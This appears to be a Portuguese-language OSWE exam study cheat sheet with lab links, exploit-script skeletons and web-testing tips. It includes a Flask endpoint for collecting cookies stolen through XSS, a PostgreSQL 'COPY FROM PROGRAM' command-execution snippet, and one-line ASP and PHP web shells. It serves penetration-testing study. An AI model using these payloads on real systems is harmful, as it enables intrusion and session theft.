Review

https://decriptosec.com/oswe-review

Máquinas para treinamento

https://github.com/bmdyy/tudo

https://github.com/bmdyy/order

https://www.vulnhub.com/entry/securecode-1,651

https://github.com/bmdyy/testr

https://github.com/bmdyy/chat.js

https://www.vulnhub.com/entry/potato-1,529

https://www.vulnhub.com/entry/raven-2,269

Esqueleto para exploits

Requisições

import requests

webSess = requests.Session()

def post(url, data):
	return webSess.post(url, data=data)

def get(url):
	return webSess.get(url)

Capturando cookie XSS

import flask

app = flask.Flask(__name__)

@app.route('/rotaxss')
def minha_rota():
  hijack = flask.request.args.get('cookie')
  # todo

app.run(host="0.0.0.0", port=80)

Shell Reversa

https://github.com/welk1n/ReverseShell-Java

PayloadAllTheThings

Python Threads

# example of running a function with arguments in another thread
from time import sleep
from threading import Thread
 
# a custom function that blocks for a moment
def task(sleep_time, message):
    # block for a moment
    sleep(sleep_time)
    # display a message
    print(message)
 
# create a thread
thread = Thread(target=task, args=(1.5, 'New message from another thread'))
# run the thread
thread.start()
# wait for the thread to finish
print('Waiting for the thread...')
thread.join()

Xfreerdp Custom Resolution

xfreerdp /u:user /p:pass /v:IP /size:1280×1024

WebSocket Python

#!/usr/bin/python
import sys, josn
from websocket import create_connection

wsurl = 'ws://%s/socket.io/?EIO=3&transport=websocket&t=DEA3af&sid=' %srvip
ws = create_connection(wsurl)
print ws.recv()
print ws.recv()

def send_data(data, expectStr):
        ws.send(data)
        while True:  
                tmp = ws.recv()
                if expectStr in tmp:
                        return tmp

data = '42["login",{"email":"teste@teste.com","password":"123"}]'
send_data(data, 'Success')

Codificar texto para hexadecimal (Ex.: \x5f\x35…)

http://www.mynikko.com/tools/tool_jsescaper.html

Escapar strings contendo muitas aspas

https://onlinestringtools.com/escape-string

PostgreSQL RCE

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
DROP TABLE IF EXISTS cmd_exec;

Ativando depurador

MySQL

$ sudo nano /etc/mysql/my.cnf
[mysqld]
...
general_log_file        = /var/log/mysql/mysql.log
general_log             = 1

$ sudo systemctl restart mysql
$ sudo tail -f /var/log/mysql/mysql.log

PHP

$ sudo nano /etc/php5/apache2/php.ini

display_errors = On

PostgreSQL Windows

1 – Editar: C:\Program Files (x86)\ManageEngine\AppManager12\working\pgsql\data\amdb\postgresql.conf

2 – Descomentar: log_statement = ‘all’ # none, ddl, mod, all

3 – Ir em C:\Program Files (x86)\ManageEngine\AppManager12\working\pgsql\data\amdb\pgsql_log\

PostgreSQL Linux

https://tableplus.com/blog/2018/10/how-to-show-queries-log-in-postgresql.html

Utilizando expressões regulares

https://decriptosec.com/utilizando-expressoes-regulares-para-auxiliar-no-seu-pentest-white-box-oswe-e-appsec

Servidor SMTP

sudo python3 -m smtpd -n -c DebuggingServer 0.0.0.0:25

One-line RCE

ASP/ASPX

<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>

<% eval request("cmd") %>

PHP

<?=`$_GET[0]`?>

Logs estilosos xD

class PepperLogger:
    @staticmethod
    def log_info(txt):
        print('[•] ' + txt)

    @staticmethod
    def log_error(txt):
        print('[-] ' + txt)

    @staticmethod
    def log_warning(txt):
        print('[!] ' + txt)

    @staticmethod
    def log_success(txt):
        print('[+] ' + txt)

Burp Copy As Python

https://portswigger.net/bappstore/b324647b6efa4b6a8f346389730df160